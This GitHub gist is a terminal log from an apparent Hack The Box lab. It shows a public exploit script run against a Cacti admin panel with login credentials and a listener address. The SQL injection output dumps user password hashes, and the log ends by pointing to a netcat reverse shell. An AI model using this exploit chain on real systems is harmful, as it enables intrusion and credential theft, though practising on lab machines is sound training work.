Skip to content

Instantly share code, notes, and snippets.

@oxtd
Created September 11, 2021 06:44
Show Gist options
  • Save oxtd/2bc5e16a7285d6d73930939fc51d12cf to your computer and use it in GitHub Desktop.
Save oxtd/2bc5e16a7285d6d73930939fc51d12cf to your computer and use it in GitHub Desktop.
4
python3 49810.py -t http://cacti-admin.monitors.htb -u admin -p <PASSWORD> --lhost 10.10.14.225 --lport 80 1 ⨯
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:4bf2475c0b3d453783fc1f9665153e363feb84b5,1631343319
[+] Trying to log in...
[+] Successfully logged in!
[+] SQL Injection:
"name","hex"
"",""
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
"guest","43e9a4ab75570f5b"
[+] Check your nc listener!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment